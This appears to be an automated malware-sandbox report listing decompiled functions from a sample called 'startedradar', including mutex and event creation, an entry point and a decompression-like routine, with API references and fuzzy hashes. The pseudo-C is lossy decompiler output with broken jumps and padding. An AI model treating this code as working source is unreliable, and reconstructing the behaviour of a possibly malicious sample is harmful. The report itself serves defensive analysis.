Function 002A1140, Relevance: 6.0, APIs: 4, Instructions: 32
memorysynchronizationCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 15%

			E002A1140(void* __edi) {
				void* _t17;
				void* _t29;
				void* _t34;
				void* _t36;
				void* _t40;
				void* _t42;
				void* _t44;
				void* _t45;
				void* _t46;

				_t40 = __edi;
				_t42 = L002A1D00(_t36, 0xcc, __edi);
				 *0x2b59dc(_t46 - 0x118, 0x40, _t42,  *((intOrPtr*)(_t46 - 8)));
				HeapFree(GetProcessHeap(), 0, _t42);
				_t17 = CreateMutexW(0, 1, _t46 - 0x118); // executed
				_t34 = _t17;
				if(_t34 != 0) {
					goto 0x5a0062;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t44 = L002A1D00(_t36, 0xcc, __edi);
					 *0x2b59dc(_t46 - 0x98, 0x40, _t44,  *((intOrPtr*)(_t46 - 8)));
					HeapFree(GetProcessHeap(), 0, _t44);
					_t45 = CreateEventW(0, 1, 0, _t46 - 0x98);
					if(_t45 != 0) {
						goto 0x5a007f;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						GetModuleFileNameW();
						_push(_t46 - 0x18);
						_push(0x80);
						_t29 = L002A1E80(_t45); // executed
						if(_t29 != 0) {
							WaitForSingleObject(_t45, 0xffffffff);
							CloseHandle( *(_t46 - 0x18));
							CloseHandle( *(_t46 - 0x14));
						}
						CloseHandle(_t45);
					}
					CloseHandle(_t34);
				}
				return _t40;
			}

0x002a1140
0x002a114a
0x002a1159
0x002a116c
0x002a117d
0x002a1183
0x002a1187
0x002a118d
0x002a1192
0x002a1193
0x002a1194
0x002a1195
0x002a1196
0x002a1197
0x002a1198
0x002a1199
0x002a11a4
0x002a11b3
0x002a11c6
0x002a11df
0x002a11e3
0x002a11e5
0x002a11ea
0x002a11eb
0x002a11ec
0x002a11ed
0x002a11ee
0x002a11ef
0x002a11f0
0x002a11f1
0x002a11f2
0x002a11f3
0x002a11fc
0x002a11fd
0x002a1208
0x002a1212
0x002a1217
0x002a1220
0x002a1229
0x002a1229
0x002a1230
0x002a1230
0x002a1237
0x002a1237
0x002a1245

APIs

_snwprintf.NTDLL ref: 002A1159
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A1165
HeapFree.KERNEL32(00000000), ref: 002A116C
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 002A117D

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$CreateFreeMutexProcess_snwprintf
String ID:
API String ID: 3932063178-0
Opcode ID: 6e225566c8434321820d1031c15d0863f072fa52f34cc3c5b96f90aca5a8a27b
Instruction ID: c8e640ae7ef213434e580b775e471346ff8aff74b2b03d85f7149a2b17dc6d86
Opcode Fuzzy Hash: 6e225566c8434321820d1031c15d0863f072fa52f34cc3c5b96f90aca5a8a27b
Instruction Fuzzy Hash: 13F023727006196FDB102BD5BC4DBDD7B18FB04312F0001A1FB0DD9181DDB2C5248BA1

Uniqueness

Uniqueness Score: 3.75%

Function 00282493, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 29
stringCOMMON

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpW.KERNELBASE ref: 002824E5

Strings

ov8oTdn, xrefs: 002824B2, 002824C7
_E9e3X1YKeRS, xrefs: 002824B8, 002824C0

Memory Dump Source

Source File: 00000008.00000002.1686354466.00280000.00000040.sdmp, Offset: 00280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_280000_startedradar.jbxd

Similarity

API ID: lstrcmp
String ID: _E9e3X1YKeRS$ov8oTdn
API String ID: 1534048567-2173848329
Opcode ID: 79dfefcc532a706336c8c8331f2d4b97044e7b0f44ad8a0576e5f4ee76b11763
Instruction ID: ac27057b11cd6d94a8f31995f0e2bcb876ac8df708e67efeb5085ed7c4af28a5
Opcode Fuzzy Hash: 79dfefcc532a706336c8c8331f2d4b97044e7b0f44ad8a0576e5f4ee76b11763
Instruction Fuzzy Hash: E6F03CB9D126288BC714EF64F8496557BF0BB44314F1040AACD499B399DB346554CF41

Uniqueness

Uniqueness Score: 0.21%

Function 002AF5E0, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t3;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t11;

				L002AD340();
				L002ADF80(); // executed
				_t3 = L002A1030(_t8, _t11); // executed
				_t12 = _t3;
				if(_t3 != 0) {
					L002ACE80(_t5, _t6, _t7, _t8, _t12);
				}
				ExitProcess(0);
			}

0x002af5e6
0x002af5eb
0x002af5f0
0x002af5f5
0x002af5f7
0x002af5f9
0x002af5f9
0x002af600

APIs

ExitProcess.KERNEL32 ref: 002AF600

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 448b343931f891fb6773c686fe98914d4e5d48bedc215fb2ba708e8dc2d391f9
Instruction ID: 0899b1f733b8b3f5defa91100f006d5d40a344ea3112917da2834fa88a7794e6
Opcode Fuzzy Hash: 448b343931f891fb6773c686fe98914d4e5d48bedc215fb2ba708e8dc2d391f9
Instruction Fuzzy Hash: 63C08C6023A70213D50037F91E0B70E31080F03361F600360FD62884C2AE40A0708EBB

Uniqueness

Uniqueness Score: 0.01%

Non-executed Functions

Function 002A53DF, Relevance: .5, Instructions: 487
COMMONCrypto

C-Code - Quality: 68%

			E002A53DF(signed int __ebx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _t595;
				signed int _t596;
				signed int _t598;
				void* _t599;
				signed int _t609;
				signed int* _t619;
				signed int _t622;
				signed int _t639;
				signed int _t641;
				signed int _t646;
				signed char _t652;
				signed int _t655;
				signed int _t657;
				signed int _t660;
				signed int _t666;
				signed int _t669;
				signed int _t671;
				void* _t673;
				signed int _t676;
				signed int _t680;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				unsigned int _t693;
				signed int _t694;
				signed int _t696;
				signed int _t697;
				signed int _t701;
				signed int _t711;
				signed int _t716;
				signed int _t718;
				signed int _t721;
				signed int _t723;
				signed int _t724;
				intOrPtr _t736;
				intOrPtr _t737;
				intOrPtr _t738;
				signed int _t741;
				signed int _t745;
				void* _t751;
				signed int _t756;
				signed int _t758;
				signed int _t762;
				signed int _t766;
				signed int _t769;
				signed int _t773;
				signed int _t778;
				signed int _t782;
				signed int _t783;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t795;
				signed int _t796;
				signed int _t798;
				signed int _t799;
				signed int _t806;
				signed int _t809;
				intOrPtr* _t811;
				void* _t812;
				signed int _t823;
				signed int _t825;
				intOrPtr _t827;
				signed int _t831;
				intOrPtr* _t833;
				signed int _t834;
				signed int _t842;
				signed int _t845;
				signed int _t848;
				signed int _t850;
				signed int _t851;
				signed int _t860;
				signed int _t863;
				void* _t864;
				void* _t865;
				void* _t866;
				void* _t867;
				void* _t868;
				void* _t869;
				void* _t870;
				void* _t871;
				signed char _t872;
				signed char _t875;
				intOrPtr _t877;
				signed int _t880;
				signed int _t881;
				signed char _t883;
				signed int _t884;
				signed int _t885;
				signed char _t890;
				signed int _t892;
				void* _t893;
				signed int _t894;
				signed int _t897;
				signed int _t898;
				signed char _t899;
				intOrPtr _t901;
				intOrPtr _t903;
				void* _t906;
				signed char _t907;
				signed char _t908;
				signed int _t909;
				signed int _t913;
				signed char _t918;
				signed int _t919;
				signed int _t920;
				signed int _t923;
				signed int _t928;
				signed int _t932;
				signed char _t936;
				signed int _t937;
				signed char _t940;
				signed int _t941;
				signed int _t949;
				signed int _t964;
				signed int _t968;
				signed int _t970;
				signed int _t974;
				signed int* _t975;
				signed char* _t980;
				signed int _t981;
				signed int _t986;
				unsigned int _t987;
				signed int _t988;
				signed int _t989;
				signed int _t992;
				signed int _t993;
				signed int _t995;
				signed int _t997;
				signed int _t998;
				signed int _t999;
				signed int _t1002;
				signed int _t1006;
				signed int _t1012;
				signed int _t1013;
				int _t1014;
				int _t1016;
				signed int _t1017;
				unsigned int _t1020;
				void* _t1024;
				intOrPtr _t1025;
				signed int _t1026;
				signed int _t1029;
				signed int _t1031;
				signed int _t1032;
				signed int _t1034;
				int _t1039;
				signed int _t1040;
				signed int _t1042;
				unsigned int _t1043;
				signed int _t1044;
				void* _t1045;
				void* _t1047;
				signed int _t1049;
				unsigned int _t1052;
				signed int _t1053;
				unsigned int _t1055;
				signed int _t1056;
				signed int _t1064;
				signed char _t1065;
				void* _t1066;
				void* _t1068;

				L0:
				while(1) {
					L0:
					_t1050 = __esi;
					_t1029 = __edi;
					_t846 = __ebx;
					if(__ebx >=  *(_t1066 - 0x20)) {
						break;
					}
					L1:
					_t872 = __esi;
					_t846 = __ebx + 1;
					_t987 = __edx | ( *__ebx & 0x000000ff) << __esi;
					 *(_t1066 - 0x18) = _t846;
					_t1064 = __esi + 8;
					 *(_t1066 - 4) = _t987;
					if(_t1064 < 0xf) {
						L227:
						_t646 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
						 *(_t1066 - 0x24) = _t646;
						__eflags = _t646;
						if(_t646 < 0) {
							L231:
							__eflags = _t1064 - 0xa;
							if(_t1064 <= 0xa) {
								continue;
							} else {
								L232:
								L233:
								 *(_t1066 - 0x1c) = _t872;
								while(1) {
									L234:
									_t872 =  *((short*)(_t1029 + 0x1700 + ((_t987 >> _t872 & 0x00000001) +  !( *(_t1066 - 0x24))) * 2));
									_t652 =  *(_t1066 - 0x1c) + 1;
									 *(_t1066 - 0x24) = _t872;
									 *(_t1066 - 0x1c) = _t652;
									__eflags = _t872;
									if(_t872 >= 0) {
										goto L2;
									}
									L235:
									__eflags = _t1064 - _t652 + 1;
									if(_t1064 < _t652 + 1) {
										goto L0;
									} else {
										L236:
										_t872 =  *(_t1066 - 0x1c);
										continue;
									}
									goto L295;
								}
								goto L2;
							}
						} else {
							L228:
							_t845 = _t646 >> 9;
							__eflags = _t845;
							if(_t845 == 0) {
								continue;
							} else {
								L229:
								__eflags = _t1064 - _t845;
								if(_t1064 >= _t845) {
									goto L2;
								} else {
									L230:
									continue;
								}
							}
						}
					} else {
						while(1) {
							L2:
							_t655 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
							 *(_t1066 - 0x1c) = _t655;
							if(_t655 < 0) {
								goto L4;
							}
							L3:
							_t872 = _t655 >> 9;
							_t660 = _t655 & 0x000001ff;
							L8:
							_t988 = _t987 >> _t872;
							_t1050 = _t1064 - _t872;
							_t875 =  *(0x2b1090 + _t660 * 4);
							_t595 =  *(0x2b1110 + _t660 * 4);
							 *(_t1066 - 4) = _t988;
							 *(_t1066 - 0x38) = _t875;
							 *(_t1066 - 0x28) = _t595;
							if(_t875 == 0) {
								L14:
								_t877 =  *(_t1066 - 0x10) -  *((intOrPtr*)(_t1066 + 0xc));
								 *((intOrPtr*)(_t1066 - 0x48)) = _t877;
								if(_t595 <= _t877 || ( *(_t1066 + 0x18) & 0x00000004) == 0) {
									L16:
									_t1029 =  *(_t1066 - 0x14);
									_t880 = (_t877 - _t595 &  *(_t1066 - 0x34)) +  *((intOrPtr*)(_t1066 + 0xc));
									 *(_t1066 - 0xc) = _t880;
									_t662 =  >  ?  *(_t1066 - 0x10) : _t880;
									_t881 =  *(_t1066 - 8);
									_t663 = ( >  ?  *(_t1066 - 0x10) : _t880) + _t881;
									_t1081 = ( >  ?  *(_t1066 - 0x10) : _t880) + _t881 -  *((intOrPtr*)(_t1066 - 0x40));
									if(( >  ?  *(_t1066 - 0x10) : _t880) + _t881 <=  *((intOrPtr*)(_t1066 - 0x40))) {
										L20:
										__eflags = _t881 - 9;
										if(_t881 < 9) {
											L29:
											goto 0x5a12f7;
											asm("int3");
											do {
												L31:
												_t881 = _t881 - 3;
												 *_t1029 =  *_t988 & 0x000000ff;
												 *((char*)(_t1029 + 1)) =  *(_t988 + 1) & 0x000000ff;
												_t666 =  *(_t988 + 2) & 0x000000ff;
												_t988 = _t988 + 3;
												 *(_t1029 + 2) = _t666;
												_t1029 = _t1029 + 3;
												__eflags = _t881 - 2;
											} while (_t881 > 2);
											 *(_t1066 - 0x10) = _t1029;
											_t1029 =  *(_t1066 - 0x14);
											 *(_t1066 - 0xc) = _t988;
											_t988 =  *(_t1066 - 4);
											 *(_t1066 - 8) = _t881;
											__eflags = _t881;
											if(_t881 > 0) {
												L33:
												goto 0x5a130b;
												asm("int3");
												_t827 =  *_t666;
												 *_t1029 = _t827;
												_t1029 =  *(_t1066 - 0x14);
												__eflags = _t881 - 1;
												if(_t881 > 1) {
													goto L35;
												}
												goto L37;
											}
										} else {
											L21:
											__eflags = _t881 -  *(_t1066 - 0x28);
											if(_t881 >  *(_t1066 - 0x28)) {
												goto L29;
											} else {
												L22:
												_t1049 =  *(_t1066 - 0xc);
												_t964 =  *(_t1066 - 0x10);
												_t831 = (_t881 & 0xfffffff8) + _t1049;
												 *(_t1066 - 0x24) = _t831;
												_t1026 = _t831;
												do {
													L23:
													 *_t964 =  *_t1049;
													_t833 =  *((intOrPtr*)(_t1049 + 4));
													_t1049 = _t1049 + 8;
													 *((intOrPtr*)(_t964 + 4)) = _t833;
													_t964 = _t964 + 8;
													__eflags = _t1049 - _t1026;
												} while (_t1049 < _t1026);
												_t988 =  *(_t1066 - 4);
												 *(_t1066 - 0x10) = _t964;
												_t881 =  *(_t1066 - 8) & 0x00000007;
												 *(_t1066 - 0xc) = _t1049;
												_t1029 =  *(_t1066 - 0x14);
												 *(_t1066 - 8) = _t881;
												__eflags = _t881 - 3;
												if(_t881 >= 3) {
													goto L29;
												} else {
													L25:
													__eflags = _t881;
													if(_t881 != 0) {
														L26:
														goto 0x5a12e3;
														asm("int3");
														_t827 =  *_t833;
														 *_t1029 = _t827;
														_t1029 =  *(_t1066 - 0x14);
														__eflags = _t881 - 1;
														if(_t881 > 1) {
															L28:
															L35:
															goto 0x5a131f;
															asm("int3");
															 *(_t988 + 1) =  *((intOrPtr*)(_t827 + 1));
															_t988 =  *(_t1066 - 4);
														}
														L37:
														_t83 = _t1066 - 0x10;
														 *_t83 =  *(_t1066 - 0x10) + _t881;
														__eflags =  *_t83;
													}
												}
											}
										}
										goto L38;
									} else {
										while(1) {
											L17:
											_t834 = _t881;
											_t881 = _t881 - 1;
											 *(_t1066 - 8) = _t881;
											if(_t834 == 0) {
												goto L38;
											}
											L18:
											if( *(_t1066 - 0x10) >=  *((intOrPtr*)(_t1066 - 0x40))) {
												L238:
												 *(_t1066 - 0xc) = 2;
												 *_t1029 = 0x35;
												goto L292;
											} else {
												L19:
												 *(_t1066 - 0x10) =  *(_t1066 - 0x10) + 1;
												 *((intOrPtr*)(_t1066 - 0x48)) =  *((intOrPtr*)(_t1066 - 0x48)) + 1;
												 *( *(_t1066 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1066 - 0x48)) -  *(_t1066 - 0x28) &  *(_t1066 - 0x34)) +  *((intOrPtr*)(_t1066 + 0xc))));
												_t988 =  *(_t1066 - 4);
												continue;
											}
											goto L295;
										}
										while(1) {
											L38:
											_t883 =  *(_t1066 - 0x20) - _t846;
											__eflags = _t883 - 4;
											if(_t883 < 4) {
												goto L57;
											}
											L39:
											_t1029 =  *(_t1066 - 0x14);
											__eflags =  *((intOrPtr*)(_t1066 - 0x40)) -  *(_t1066 - 0x10) - 2;
											if( *((intOrPtr*)(_t1066 - 0x40)) -  *(_t1066 - 0x10) < 2) {
												goto L57;
											} else {
												L40:
												__eflags = _t1050 - 0xf;
												if(_t1050 < 0xf) {
													_t1002 =  *(_t846 + 1) & 0x000000ff;
													_t883 = _t1050;
													_t724 =  *_t846 & 0x000000ff;
													_t846 = _t846 + 2;
													 *(_t1066 - 0x18) = _t846;
													 *(_t1066 - 4) =  *(_t1066 - 4) | (_t1002 << 0x00000008 | _t724) << _t883;
													_t1050 = _t1050 + 0x10;
													__eflags = _t1050;
													_t988 =  *(_t1066 - 4);
												}
												_t595 =  *((short*)(_t1029 + 0x160 + (_t988 & 0x000003ff) * 2));
												 *(_t1066 - 8) = _t595;
												__eflags = _t595;
												if(_t595 < 0) {
													L44:
													goto 0x5a1333;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L45:
														_t711 = _t988 >> _t883;
														_t883 = _t883 + 1;
														_t595 = (_t711 & 0x00000001) +  !_t846;
														_t846 =  *((short*)(_t1029 + 0x960 + _t595 * 2));
														__eflags = _t846;
													} while (_t846 < 0);
													 *(_t1066 - 8) = _t846;
													_t846 =  *(_t1066 - 0x18);
												} else {
													L43:
													_t883 = _t595 >> 9;
												}
												L47:
												_t987 = _t988 >> _t883;
												_t1064 = _t1050 - _t883;
												_t884 =  *(_t1066 - 8);
												 *(_t1066 - 4) = _t987;
												__eflags = _t884 & 0x00000100;
												if((_t884 & 0x00000100) != 0) {
													L83:
													_t885 = _t884 & 0x000001ff;
													 *(_t1066 - 8) = _t885;
													__eflags = _t885 - 0x100;
													if(_t885 != 0x100) {
														L219:
														_t673 = _t885 * 4 - 0x404;
														_t872 =  *(_t673 + 0x2b1010);
														_t595 =  *(_t673 + 0x2b1a48);
														 *(_t1066 - 0x38) = _t872;
														 *(_t1066 - 8) = _t595;
														__eflags = _t872;
														if(_t872 == 0) {
															L225:
															__eflags = _t1064 - 0xf;
															if(_t1064 >= 0xf) {
																L2:
																_t655 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
																 *(_t1066 - 0x1c) = _t655;
																if(_t655 < 0) {
																	goto L4;
																}
																goto L8;
															} else {
																L226:
																__eflags =  *(_t1066 - 0x20) - _t846 - 2;
																if( *(_t1066 - 0x20) - _t846 >= 2) {
																	L237:
																	_t989 =  *(_t846 + 1) & 0x000000ff;
																	_t676 =  *_t846 & 0x000000ff;
																	_t846 = _t846 + 2;
																	_t1029 =  *(_t1066 - 0x14);
																	_t872 = _t1064;
																	 *(_t1066 - 0x18) = _t846;
																	 *(_t1066 - 4) =  *(_t1066 - 4) | _t989 << _t1064 + 0x00000008 | _t676 << _t872;
																	_t1064 = _t1064 + 0x10;
																	_t987 =  *(_t1066 - 4);
																	do {
																		goto L2;
																	} while (_t1064 >= 0xf);
																	goto L226;
																} else {
																	goto L227;
																}
															}
														} else {
															L220:
															__eflags = _t1064 - _t872;
															if(_t1064 >= _t872) {
																L223:
																L224:
																_t1064 = _t1064 - _t872;
																_t680 = (_t595 << _t872) - 0x00000001 & _t987;
																_t987 = _t987 >> _t872;
																_t456 = _t1066 - 8;
																 *_t456 =  *(_t1066 - 8) + _t680;
																__eflags =  *_t456;
																 *(_t1066 - 4) = _t987;
																goto L225;
															} else {
																while(1) {
																	L221:
																	__eflags = _t846 -  *(_t1066 - 0x20);
																	if(_t846 >=  *(_t1066 - 0x20)) {
																		break;
																	}
																	L222:
																	_t595 = ( *_t846 & 0x000000ff) << _t1064;
																	_t846 = _t846 + 1;
																	_t872 =  *(_t1066 - 0x38);
																	_t987 = _t987 | _t595;
																	_t1050 = _t1064 + 8;
																	 *(_t1066 - 0x18) = _t846;
																	 *(_t1066 - 4) = _t987;
																	__eflags = _t1050 - _t872;
																	if(_t1050 < _t872) {
																		continue;
																	} else {
																		goto L223;
																	}
																	goto L295;
																}
																L262:
																 *_t1029 = 0x19;
																goto L285;
															}
														}
													} else {
														while(1) {
															L84:
															__eflags =  *(_t1029 + 0x14) & 0x00000001;
															if(( *(_t1029 + 0x14) & 0x00000001) != 0) {
																break;
															}
															L85:
															__eflags = _t1064 - 3;
															if(_t1064 >= 3) {
																L88:
																_t1050 = _t1064 - 3;
																_t693 = _t987 & 0x00000007;
																_t997 = _t987 >> 3;
																 *(_t1029 + 0x14) = _t693;
																_t694 = _t693 >> 1;
																__eflags = _t694;
																 *(_t1066 - 4) = _t997;
																 *(_t1066 - 0x1c) = _t1050;
																 *(_t1029 + 0x18) = _t694;
																if(_t694 != 0) {
																	L123:
																	__eflags = _t694 - 3;
																	if(_t694 == 3) {
																		L266:
																		 *(_t1066 - 0xc) = 0xffffffff;
																		 *_t1029 = 0xa;
																		goto L292;
																	} else {
																		L124:
																		__eflags = _t694 - 1;
																		if(_t694 != 1) {
																			L127:
																			_t897 = 0;
																			__eflags = 0;
																			while(1) {
																				L128:
																				 *(_t1066 - 8) = _t897;
																				__eflags = _t897 - 3;
																				if(_t897 >= 3) {
																					break;
																				}
																				L129:
																				_t595 =  *((char*)(_t897 + 0x2b1004));
																				 *(_t1066 - 0x1c) = _t595;
																				__eflags = _t1050 - _t595;
																				if(_t1050 >= _t595) {
																					L132:
																					_t1024 = _t1029 + _t897 * 4;
																					_t1043 =  *(_t1066 - 4);
																					 *(_t1024 + 0x2c) = (0x00000001 <<  *(_t1066 - 0x1c)) - 0x00000001 & _t1043;
																					_t806 =  *(_t1066 - 8);
																					_t936 =  *((char*)(_t806 + 0x2b1004));
																					_t1044 = _t1043 >> _t936;
																					_t1050 = _t1050 - _t936;
																					_t937 = _t806;
																					 *(_t1066 - 4) = _t1044;
																					 *(_t1066 - 0x1c) = _t1050;
																					 *(_t1024 + 0x2c) =  *(_t1024 + 0x2c) +  *((intOrPtr*)(0x2b1a38 + _t937 * 4));
																					_t997 = _t1044;
																					_t1029 =  *(_t1066 - 0x14);
																					_t897 = _t937 + 1;
																					continue;
																				} else {
																					while(1) {
																						L130:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L131:
																						_t809 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t897 =  *(_t1066 - 8);
																						_t997 = _t997 | _t809;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 0x18) = _t846;
																						 *(_t1066 - 4) = _t997;
																						_t595 =  *((char*)(_t897 + 0x2b1004));
																						 *(_t1066 - 0x1c) = _t595;
																						__eflags = _t1050 - _t595;
																						if(_t1050 < _t595) {
																							continue;
																						} else {
																							goto L132;
																						}
																						goto L295;
																					}
																					L248:
																					 *_t1029 = 0xb;
																					goto L285;
																				}
																				goto L295;
																			}
																			L133:
																			L134:
																			_t595 = memset(_t1029 + 0x1b80, 0, ??);
																			_t998 =  *(_t1066 - 4);
																			_t1068 = _t1068 + 0xc;
																			_t898 = 0;
																			__eflags = 0;
																			while(1) {
																				L135:
																				 *(_t1066 - 8) = _t898;
																				__eflags = _t898 -  *((intOrPtr*)(_t1029 + 0x34));
																				if(_t898 >=  *((intOrPtr*)(_t1029 + 0x34))) {
																					break;
																				}
																				L136:
																				__eflags = _t1050 - 3;
																				if(_t1050 >= 3) {
																					L139:
																					_t932 = _t998 & 0x00000007;
																					_t998 = _t998 >> 3;
																					_t1050 = _t1050 - 3;
																					 *(_t1066 - 4) = _t998;
																					 *(_t1066 - 0x1c) = _t1050;
																					_t595 =  *( *(_t1066 - 8) + 0x2b1a24) & 0x000000ff;
																					 *(_t1029 + 0x1b80 + _t595) = _t932;
																					_t898 =  *(_t1066 - 8) + 1;
																					continue;
																				} else {
																					while(1) {
																						L137:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L138:
																						_t595 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t998 = _t998 | _t595;
																						 *(_t1066 - 0x18) = _t846;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 4) = _t998;
																						__eflags = _t1050 - 3;
																						if(_t1050 < 3) {
																							continue;
																						} else {
																							goto L139;
																						}
																						goto L295;
																					}
																					L249:
																					 *_t1029 = 0xe;
																					goto L285;
																				}
																				goto L295;
																			}
																			L140:
																			 *((intOrPtr*)(_t1029 + 0x34)) = 0x13;
																			goto L141;
																		} else {
																			L125:
																			goto 0x5a13af;
																			asm("int3");
																			asm("int3");
																			 *((intOrPtr*)(_t694 + 0x2c)) = 0x120;
																			L126:
																			_t811 = _t694 + 1 - 0x20;
																			 *_t811 =  *_t811 + _t811;
																			_t846 = _t846 + _t811;
																			_t812 = _t811 + 1;
																			 *_t812 =  *_t812 ^ _t812;
																			 *_t812 = _t812 +  *_t812;
																			 *0xde0 =  *0xde0 + _t812;
																			memset(_t812, ??, ??);
																			asm("movdqa xmm0, [0x2b1ae0]");
																			_t1068 = _t1068 + 0xc;
																			asm("movdqu [edi+0x40], xmm0");
																			asm("movdqu [edi+0x50], xmm0");
																			asm("movdqu [edi+0x60], xmm0");
																			asm("movdqu [edi+0x70], xmm0");
																			asm("movdqu [edi+0x80], xmm0");
																			asm("movdqu [edi+0x90], xmm0");
																			asm("movdqu [edi+0xa0], xmm0");
																			asm("movdqu [edi+0xb0], xmm0");
																			asm("movdqu [edi+0xc0], xmm0");
																			_t1045 = _t1029 + 0xd0;
																			asm("movdqa xmm0, [0x2b1af0]");
																			asm("movdqu [edi], xmm0");
																			asm("movdqu [edi+0x10], xmm0");
																			asm("movdqu [edi+0x20], xmm0");
																			asm("movdqu [edi+0x30], xmm0");
																			asm("movdqu [edi+0x40], xmm0");
																			asm("movdqu [edi+0x50], xmm0");
																			asm("movdqu [edi+0x60], xmm0");
																			asm("movdqa xmm0, [0x2b1ad0]");
																			asm("movdqu [edi+0x70], xmm0");
																			asm("movq [edi+0x80], xmm0");
																			 *((intOrPtr*)(_t1045 + 0x88)) = 0x8080808;
																			 *((intOrPtr*)(_t1045 + 0x8c)) = 0x8080808;
																			_t1029 =  *(_t1066 - 0x14);
																			while(1) {
																				L141:
																				_t696 =  *(_t1029 + 0x18);
																				__eflags = _t696;
																				if(_t696 < 0) {
																					break;
																				}
																				L142:
																				 *(_t1066 - 0xc) = 0x40 + _t696 * 0xda0 + _t1029;
																				memset(_t1066 - 0xd0, 0, 0x40);
																				memset( *(_t1066 - 0xc) + 0x120, 0, 0x800);
																				memset( *(_t1066 - 0xc) + 0x920, 0, 0x480);
																				_t899 = 0;
																				_t1068 = _t1068 + 0x24;
																				_t1012 = _t1029 + ( *(_t1029 + 0x18) + 0xb) * 4;
																				 *(_t1066 - 0x44) = _t1012;
																				__eflags =  *_t1012;
																				if( *_t1012 > 0) {
																					L143:
																					_t1029 =  *(_t1066 - 0xc);
																					do {
																						L144:
																						_t799 =  *(_t899 + _t1029) & 0x000000ff;
																						_t899 = _t899 + 1;
																						 *((intOrPtr*)(_t1066 + _t799 * 4 - 0xd0)) =  *((intOrPtr*)(_t1066 + _t799 * 4 - 0xd0)) + 1;
																						__eflags = _t899 -  *_t1012;
																					} while (_t899 <  *_t1012);
																				}
																				L145:
																				goto 0x5a13d7;
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				L146:
																				 *(_t1066 - 0x8c) = _t899;
																				 *(_t1066 - 0x90) = _t899;
																				 *(_t1066 - 0x2c) = _t899;
																				 *(_t1066 - 0x30) = _t899;
																				do {
																					L147:
																					_t736 =  *((intOrPtr*)(_t1066 + _t1012 - 0xd4));
																					_t901 = _t899 + _t736 + _t899 + _t736;
																					_t1029 = _t1029 + _t736;
																					_t737 =  *((intOrPtr*)(_t1066 + _t1012 - 0xd0));
																					 *(_t1066 - 0x30) =  *(_t1066 - 0x30) + _t737;
																					 *((intOrPtr*)(_t1066 + _t1012 - 0x90)) = _t901;
																					_t738 =  *((intOrPtr*)(_t1066 + _t1012 - 0xcc));
																					_t903 = _t901 + _t737 + _t901 + _t737;
																					 *(_t1066 - 0x2c) =  *(_t1066 - 0x2c) + _t738;
																					 *((intOrPtr*)(_t1066 + _t1012 - 0x8c)) = _t903;
																					_t899 = _t903 + _t738 + _t903 + _t738;
																					 *(_t1066 + _t1012 - 0x88) = _t899;
																					_t1012 = _t1012 + 0xc;
																					__eflags = _t1012 - 0x40;
																				} while (_t1012 <= 0x40);
																				 *(_t1066 - 0x4c) = _t899;
																				 *(_t1066 - 0x24) = _t1029;
																				_t1029 =  *(_t1066 - 0x14);
																				_t906 =  *(_t1066 - 0x24) +  *(_t1066 - 0x2c) +  *(_t1066 - 0x30);
																				__eflags =  *(_t1066 - 0x4c) - 0x10000;
																				if( *(_t1066 - 0x4c) == 0x10000) {
																					L150:
																					_t741 =  *(_t1066 - 0x44);
																					 *(_t1066 - 0x30) = 0xffffffff;
																					 *(_t1066 - 0x4c) = 0;
																					__eflags =  *_t741;
																					if( *_t741 > 0) {
																						L151:
																						_t1065 =  *(_t1066 - 0x4c);
																						do {
																							L152:
																							L153:
																							_t918 =  *(_t1065 + _t741) & 0x000000ff;
																							 *(_t1066 - 0x44) = _t918;
																							__eflags = _t918;
																							if(_t918 != 0) {
																								L154:
																								_t778 =  *(_t1066 + _t918 * 4 - 0x90);
																								 *(_t1066 - 0x2c) = _t778;
																								 *(_t1066 + _t918 * 4 - 0x90) = _t778 + 1;
																								 *(_t1066 - 0x24) = _t918;
